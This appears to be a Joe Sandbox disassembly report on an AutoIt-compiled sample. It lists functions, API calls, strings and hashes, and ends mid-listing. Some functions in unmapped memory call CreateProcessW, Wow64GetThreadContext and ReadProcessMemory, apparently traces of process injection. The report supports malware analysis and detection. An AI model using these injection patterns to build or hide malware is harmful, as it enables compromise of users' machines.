Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 763fe55bb00862e76562bc918d65cda62da49fe4638f8bc3292642742d910283
Instruction ID: 0765c8b2ae04e6575d0250e33e7d921c30b4b0be412d9d7b6f1269546871a2f7
Opcode Fuzzy Hash: 763fe55bb00862e76562bc918d65cda62da49fe4638f8bc3292642742d910283
Instruction Fuzzy Hash: 0BC15CB1D10219AACF21DFA4CC85AEEB7BCEF45340F0040AAF609E6141EB309A94CF65

Function 0025301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00253074
RegisterClassExW.USER32(00000030), ref: 0025309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002530AF
InitCommonControlsEx.COMCTL32(?), ref: 002530CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002530DC
LoadIconW.USER32(000000A9), ref: 002530F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00253101

Strings

AutoIt v3 GUI, xrefs: 00253090
TaskbarCreated, xrefs: 002530A4
+, xrefs: 0025305D
0, xrefs: 00253056

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 4ecd207570390b65ff0150c2f5128f1f8966d0ed5c929ab62868bcbae033e1d8
Instruction ID: 1d1475371b4b99fad3009153af2829507d09de7c005399f53393d1387765acbd
Opcode Fuzzy Hash: 4ecd207570390b65ff0150c2f5128f1f8966d0ed5c929ab62868bcbae033e1d8
Instruction Fuzzy Hash: F73125B1D51309EFDB41CFA4E989ADDBBF4FB09310F14812AE581E62A0E3B50995CF94

Function 00253041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00253074
RegisterClassExW.USER32(00000030), ref: 0025309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002530AF
InitCommonControlsEx.COMCTL32(?), ref: 002530CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002530DC
LoadIconW.USER32(000000A9), ref: 002530F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00253101

Strings

AutoIt v3 GUI, xrefs: 00253090
TaskbarCreated, xrefs: 002530A4
+, xrefs: 0025305D
0, xrefs: 00253056

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 984ac3025875dd25feac85a7e5c9013fd3a9ce666835817213392e12bd62bae7
Instruction ID: dd767c4c6a9e6f998bb14d1d45b0e7ea6628b964d4d009b1efc6574edd323447
Opcode Fuzzy Hash: 984ac3025875dd25feac85a7e5c9013fd3a9ce666835817213392e12bd62bae7
Instruction Fuzzy Hash: 1F21E4B1E11318EFDB41DFA4E948BDDBBF8FB08701F00812AF911A62A0D7B149448F95

Function 0025708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00254706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003152F8,?,002537AE,?), ref: 00254724

Part of subcall function 0027050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00257165), ref: 0027052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002571A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0028E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0028E909
RegCloseKey.ADVAPI32(?), ref: 0028E947
_wcscat.LIBCMT ref: 0028E9A0

Strings

Include, xrefs: 0028E8BF, 0028E900
\, xrefs: 0028E9C3
Software\AutoIt v3\AutoIt, xrefs: 0025719E
\Include\, xrefs: 00257165

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 12fc1ab0af14d7941d3ba5c08b1da380ac58131c720fbf2345c204e2b740b10e
Instruction ID: dcf5aec45d6f5d3c50c7172fa2dc13a1e0a64a42cc47f04866a3b4495c8c6d80
Opcode Fuzzy Hash: 12fc1ab0af14d7941d3ba5c08b1da380ac58131c720fbf2345c204e2b740b10e
Instruction Fuzzy Hash: 4471BF715293019EC701EF65EC829ABBBECFF89350F40892EF845831A0DB719969CF56

Function 00253633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 002536D2
KillTimer.USER32(?,00000001), ref: 002536FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0025371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0025372A
CreatePopupMenu.USER32 ref: 0025373E
PostQuitMessage.USER32(00000000), ref: 0025374D

Strings

%., xrefs: 0028D081, 0028D0CF
TaskbarCreated, xrefs: 00253725

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%.
API String ID: 129472671-2498375929
Opcode ID: 4463f0480f3eb66f3431fffa4649e2e66a3ed5c6c486ae286b41a3138e8e2088
Instruction ID: ccd9b41c50be9d05bc60da75f55283ced01d090ed2d0e748673aeeaa4f5cfd5b
Opcode Fuzzy Hash: 4463f0480f3eb66f3431fffa4649e2e66a3ed5c6c486ae286b41a3138e8e2088
Instruction Fuzzy Hash: B2414876630506EBDB15AF64EC09BF97798EB48382F141429FD02822E1CAB09D79972D

Function 00253A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00253A50
LoadCursorW.USER32(00000000,00007F00), ref: 00253A5F
LoadIconW.USER32(00000063), ref: 00253A76
LoadIconW.USER32(000000A4), ref: 00253A88
LoadIconW.USER32(000000A2), ref: 00253A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00253AC0
RegisterClassExW.USER32(?), ref: 00253B16

Part of subcall function 00253041: GetSysColorBrush.USER32(0000000F), ref: 00253074
Part of subcall function 00253041: RegisterClassExW.USER32(00000030), ref: 0025309E
Part of subcall function 00253041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002530AF
Part of subcall function 00253041: InitCommonControlsEx.COMCTL32(?), ref: 002530CC
Part of subcall function 00253041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002530DC
Part of subcall function 00253041: LoadIconW.USER32(000000A9), ref: 002530F2
Part of subcall function 00253041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00253101

Strings

AutoIt v3, xrefs: 00253B05
#, xrefs: 00253AFB
0, xrefs: 00253AF4

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 04c250dcfa9cbe11fff4da8e9b41828b702cd821da03b2fbd58cc22a2f613498
Instruction ID: 908512b8c2428dc11aedf9b915db45b617cead640178d12143ccbab4c76231f2
Opcode Fuzzy Hash: 04c250dcfa9cbe11fff4da8e9b41828b702cd821da03b2fbd58cc22a2f613498
Instruction Fuzzy Hash: 1B213C72D11304EFEB12DFA4ED09BDD7BB8EB4C711F00851AF500A62A1D3B65A558F88

Function 00253766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/ErrorStdOut, xrefs: 0025387D
CMDLINE, xrefs: 00253822
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 002537AE
/AutoIt3OutputDebug, xrefs: 00253892
R1, xrefs: 0028D213
/AutoIt3ExecuteLine, xrefs: 002538A7
CMDLINERAW, xrefs: 002537FB
/AutoIt3ExecuteScript, xrefs: 002538BC

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R1
API String ID: 1825951767-3288481718
Opcode ID: a8be99c7fe1b66c0087ba163f41e94ccf671039affcbb20f9329a7af193115cc
Instruction ID: ee47cf20cb91dda4a313464fcf6954623b1171cd3d2e2ec2758cd0dfd8d2f6cb
Opcode Fuzzy Hash: a8be99c7fe1b66c0087ba163f41e94ccf671039affcbb20f9329a7af193115cc
Instruction Fuzzy Hash: 75A17F7292022DDACB05EBA0DC56AEEB778BF15341F40042AF816B7191DF745A2DCFA4

Function 0025F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00270162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00270193
Part of subcall function 00270162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0027019B
Part of subcall function 00270162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002701A6
Part of subcall function 00270162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002701B1
Part of subcall function 00270162: MapVirtualKeyW.USER32(00000011,00000000), ref: 002701B9
Part of subcall function 00270162: MapVirtualKeyW.USER32(00000012,00000000), ref: 002701C1

Part of subcall function 002660F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0025F930), ref: 00266154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0025F9CD
OleInitialize.OLE32(00000000), ref: 0025FA4A
CloseHandle.KERNEL32(00000000), ref: 002945C8

Strings

%., xrefs: 0025F796, 0025F7A8, 0025F96E, 0025FA51
S1, xrefs: 0025F7EB
<W1, xrefs: 0025F930
\T1, xrefs: 0025F7F7

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <W1$\T1$%.$S1
API String ID: 1986988660-287808681
Opcode ID: d66eee8cfc9e2c0a3784afe1afb974d1d99f9cddc3f9800617858f9f67568fcb
Instruction ID: db567bb9ecf8688808c77e944396fc053d8d7f8d5fe4ae21161e44e6ba317a09
Opcode Fuzzy Hash: d66eee8cfc9e2c0a3784afe1afb974d1d99f9cddc3f9800617858f9f67568fcb
Instruction Fuzzy Hash: 5081BBB4921A40CFD386DF2AE9856D87BEDFBDC306B90C52AD419CB2A1EB704494CF15

Function 0147DFC8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0147E099
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0147E2BF

Memory Dump Source

Source File: 00000000.00000002.2057399383.000000000147B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0147B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_147b000_BgroUcYHpy.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction ID: 8014a3960fd0206df5355d0af02d55e134090448e46b5713fba15327a7f4b32f
Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction Fuzzy Hash: 55A10B70E00209EBDB14CFA4D899BEEBBB5FF48304F10869AE611BB290D7755A41CB54

Function 002539D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00253A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00253A24
ShowWindow.USER32(00000000,?,?), ref: 00253A38
ShowWindow.USER32(00000000,?,?), ref: 00253A41

Strings

AutoIt v3, xrefs: 002539FB, 00253A00, 00253A01
edit, xrefs: 00253A1E

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: ec5f932ddc784bffb54df2ffa27b67b4fc278055e55fa15f1a5eba627aa7a981
Instruction ID: a168245b292067db31407b14037ce5843778e3f6dd61c57981f888eb890cd4ce
Opcode Fuzzy Hash: ec5f932ddc784bffb54df2ffa27b67b4fc278055e55fa15f1a5eba627aa7a981
Instruction Fuzzy Hash: 78F03072901290BEEA325713AC0CEA72E7DD7CAF50F00842AB900A2170C1710C12CA74

Function 0147DD58 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 158
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0147DC48: Sleep.KERNELBASE(000001F4), ref: 0147DC59

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0147DEB5

Strings

KYB1BBI9XGIUBAXEF10WL2, xrefs: 0147DF18, 0147DF1B

Memory Dump Source

Source File: 00000000.00000002.2057399383.000000000147B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0147B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_147b000_BgroUcYHpy.jbxd

Similarity

API ID: CreateFileSleep
String ID: KYB1BBI9XGIUBAXEF10WL2
API String ID: 2694422964-2127188597
Opcode ID: c685f787fa3b598ef6b6e4d9686d65184fc07d78ce5698d3f86225c394b1a370
Instruction ID: 1522888d20310e3b2a90155260c4ea74276cb2347f98e877f1d58063098c829d
Opcode Fuzzy Hash: c685f787fa3b598ef6b6e4d9686d65184fc07d78ce5698d3f86225c394b1a370
Instruction Fuzzy Hash: 39619070D14288DAEF11DBF4D844BEEBB79AF29300F044599E248BB2C1D7BA1B45CB65

Function 0025407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0028D3D7

Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06

_memset.LIBCMT ref: 002540FC
_wcscpy.LIBCMT ref: 00254150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00254160

Strings

Line: , xrefs: 0028D400

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: a95ae6c7f1456821bd14435ec1a6706281193bd82d1a0ad495ad30536dbe210d
Instruction ID: d71e7d7071922123dba66009739b986eaf4e78f8e4c7f68d456b7d842892843f
Opcode Fuzzy Hash: a95ae6c7f1456821bd14435ec1a6706281193bd82d1a0ad495ad30536dbe210d
Instruction Fuzzy Hash: 8E31E6720287019BD325EF60EC45FDB77DCAF54305F10491AF985920D1DB7096ADCB8A

Function 0027541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0027547B
_memcpy_s.LIBCMT ref: 002754ED
__read_nolock.LIBCMT ref: 0027554B
__filbuf.LIBCMT ref: 0027556E
_memset.LIBCMT ref: 002755B2

Part of subcall function 00278B28: __getptd_noexit.LIBCMT ref: 00278B28

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: 1b673af7f11bd7ac35374ad8c73e5f637c4a9c2f140a51301c912119ef1e71f1
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: FA51CA70A20B26DBDB249F65D84056EF7A6AF40321F54C729F82D962D0D7F09D748F41

Function 0025686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00254DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254E0F

_free.LIBCMT ref: 0028E263
_free.LIBCMT ref: 0028E2AA

Part of subcall function 00256A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00256BAD

Strings

Bad directive syntax error, xrefs: 0028E292
>>>AUTOIT SCRIPT<<<, xrefs: 0028E039

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: b7d9aaf3bf05098e38c21cdd87134ca45f95ec55307d3a12c015ab92f819749f
Instruction ID: 59d63a66c3f923265a354729697094777cd414d21b8c06ed26f53f8b3dcdecb1
Opcode Fuzzy Hash: b7d9aaf3bf05098e38c21cdd87134ca45f95ec55307d3a12c015ab92f819749f
Instruction Fuzzy Hash: 6C919E719212199FCF04EFA4CC919EDB7B8FF09310B04446AF815AB2A1DB70AD69CF54

Function 002535B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,002535A1,SwapMouseButtons,00000004,?), ref: 002535D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,002535A1,SwapMouseButtons,00000004,?,?,?,?,00252754), ref: 002535F5
RegCloseKey.KERNELBASE(00000000,?,?,002535A1,SwapMouseButtons,00000004,?,?,?,?,00252754), ref: 00253617

Strings

Control Panel\Mouse, xrefs: 002535D2

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 20d02c0009e48378c3b0d77738316feddcfc5f0ae7e8a3b24f1677bb022afdd0
Instruction ID: 31cec260d37ed567aef6a01631f15da5a0f4ab2ab1e5251848f3776cd14cb6f2
Opcode Fuzzy Hash: 20d02c0009e48378c3b0d77738316feddcfc5f0ae7e8a3b24f1677bb022afdd0
Instruction Fuzzy Hash: 45115A71921209BFDB20CF64EC44EAEB7BCEF04781F00946AF805D7210D2719F649768

Function 0147CC48 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0147D403
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0147D499
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0147D4BB

Memory Dump Source

Source File: 00000000.00000002.2057399383.000000000147B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0147B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_147b000_BgroUcYHpy.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
Instruction ID: 1f75eec1ca7576c673fecf6f2b59764d66635bfa55e36355e68852faafd0544b
Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
Instruction Fuzzy Hash: 9962FA30E142589BEB24DFA4C850BDEB776EF58300F1091A9D20DEB3A0E7759E85CB59

Function 002B955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00254EE5: _fseek.LIBCMT ref: 00254EFD

Part of subcall function 002B9734: _wcscmp.LIBCMT ref: 002B9824
Part of subcall function 002B9734: _wcscmp.LIBCMT ref: 002B9837

_free.LIBCMT ref: 002B96A2
_free.LIBCMT ref: 002B96A9
_free.LIBCMT ref: 002B9714

Part of subcall function 00272D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00279A24), ref: 00272D69
Part of subcall function 00272D55: GetLastError.KERNEL32(00000000,?,00279A24), ref: 00272D7B

